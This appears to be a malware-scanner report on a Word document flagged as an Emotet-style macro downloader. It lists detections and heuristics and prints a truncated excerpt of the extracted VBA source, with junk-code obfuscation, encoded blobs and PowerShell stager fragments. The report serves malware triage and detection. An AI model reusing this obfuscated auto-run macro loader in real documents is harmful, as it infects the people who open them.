MALICIOUS
224
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The file contains a VBA macro with an AutoOpen function, indicating it is designed to execute automatically upon opening. Heuristics confirm the presence of VBA macros and a CreateObject call, commonly used to instantiate objects for malicious purposes. The ClamAV detection and the presence of a VBA macro named 'macros.bas' strongly suggest this is a downloader for a second-stage payload.
Heuristics 8
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 44366 bytes |
SHA-256: e4d851b46242e6a9cfe137c85bebef15ebd3d14369de44aa8af6d7f8626ba63a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 8 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "rzasRsGmanKPSm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "rJAJTdjKqwnb"
Function YaLpPCYozhSdr()
On Error Resume Next
Select Case iDLAiL
Case 6565
mXzqtq = 98736
SODiVY = Sqr(91141)
Case 36504
UarMWz = CSng(ELjGN)
GGSfi = ZMDVW
End Select
zIVXa = rGrlAC("jqwD4T6aOfEG/bPqfiZUPesTqXyOOj9Wn03CLcl5w7UY/Cf+aw0pzTKB/D3zZ", 5, 53)
Select Case YGsEb
Case 20753
sYKlL = 53585
apmhJ = Sqr(86767)
Case 73203
IzMqp = CSng(tPQFUD)
qQzkVz = cwUGD
End Select
Select Case iwnUv
Case 42678
oqGWB = 94143
VWJab = Sqr(9279)
Case 6738
zDFjA = CSng(BPnbI)
JZjNK = fdvsaT
End Select
KZpRFBVh = rGrlAC("AaSCIi ) }).REaDtoEnD() | .( $EnV:comSPEc[4,15,25]-jOIn'')z.1w46FR", 2, 57)
Select Case QdPqQz
Case 74230
HzjPPV = 8037
aSvtos = Sqr(92404)
Case 75418
QhZabG = CSng(mmjamZ)
dVIBZ = wvYbqU
End Select
Select Case OwVpu
Case 54368
VBtnC = 74086
JdhUh = Sqr(80562)
Case 11598
tvTkEZ = CSng(MzwEG)
cMVuUf = NwmKVG
End Select
WRTsvlDwCK = rGrlAC("qlODk9GyfTd+MkOxnn2fj0dHyaxkV8kSfjk8k4y+Pfp+M0ycZpmo6zk9HR6Oi43TzdFxdfHx4/vX8sfm6qp6X76a2GFM", 3, 84)
Select Case wDVojz
Case 39998
aWJXb = 14605
uqwfWj = Sqr(33777)
Case 23495
NKUjzJ = CSng(PwoRI)
IUHSZl = lzEiYB
End Select
Select Case BDOiA
Case 66991
anLcwr = 77281
OKAPH = Sqr(69777)
Case 74358
naWbmw = CSng(QVWOQ)
iBMzWE = mBKTf
End Select
MChVdoJjuuA = rGrlAC("2vzvrG+OL/r7yA3FfoZ7O4kA+duSHnUc+plg74R9r7JuoXgn8hV1vec2Fmx1w5ulX1TKvFfJb2H03ytP05Rzye233rTxxvwm9", 5, 90)
Select Case SADBNZ
Case 29223
bIiGI = 56368
vGadYQ = Sqr(70475)
Case 17083
QlfcBl = CSng(CwwiI)
UJoAW = tisNb
End Select
Select Case jBEmD
Case 68400
JkUMwp = 41119
lBiNJG = Sqr(92024)
Case 94113
kVdFWF = CSng(rpOTa)
VEjIa = fPMXiN
End Select
duOipjRF = rGrlAC("Aii2tLXjnyZF6oTdJr9paeeoo6oD/V/0EPqH3CdS6dy4eMO+AT/Bv8C80n97Nhvja+DzrR2PoN+ttTJRjhcyR71eKnzTvwO1BnooOFy0E3P+KkHyCPjKMhP9ul833/myG8iv6fS32vyXv27Z3/HXMB7UY+mJX8bO09dxnwRxAfoLXDD/Zw/WuKAuE73uroA72/EnwP", 5, 192)
Select Case BQzGO
Case 76897
PBiGo = 74035
GVJbCB = Sqr(62194)
Case 61963
dAfBRZ = CSng(wurRE)
tiAfVq = WdUoP
End Select
Select Case zJiwp
Case 43154
hHYwb = 26113
hGzKaj = Sqr(8372)
Case 5838
torhEV = CSng(rwVPi)
iktmG = RSCSvP
End Select
sJNUvMYdXt = rGrlAC("J5BF4N0e/69kHzY+gucnwY/gsX/GA+GDdlvu5g3MG8juhPphdJ71ekhecv57Z5zTntNLJVnMLcDL0F2/PTPfvxKdX/QD9UHpqfnr10zXjWdT7eYhxl/InyL+gflmrP8J/6D71olbf8pxTXuk++xTO96pHAsNa@u", 2, 152)
Select Case qTRPL
Case 96375
jlIwoR = 21728
hwGzN = Sqr(44506)
Case 53299
QocQl = CSng(qVvRE)
nZiKRk = sbuzoc
End Select
Select Case jHUvCu
Case 71058
iQNrPu = 93030
irtlOt = Sqr(46288)
Case 64506
kzoLlT = CSng(hZuhwW)
muWAT = AaJNkb
End Select
dXqvMfUkv = rGrlAC("0Ap6/Do+NflP+fx5Xz0e3R8OPrj1z8fH+6Kb2ny/Y39XpXFtyz//uZge3D0Hw==' ) ,[io.COMPreSsion.CoMpReSsIon3LOj", 4, 92)
Select Case tdQpj
Case 74117
Szwms = 94640
KpAOz = Sqr(14914)
Case 41056
qrtEA = CSn
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.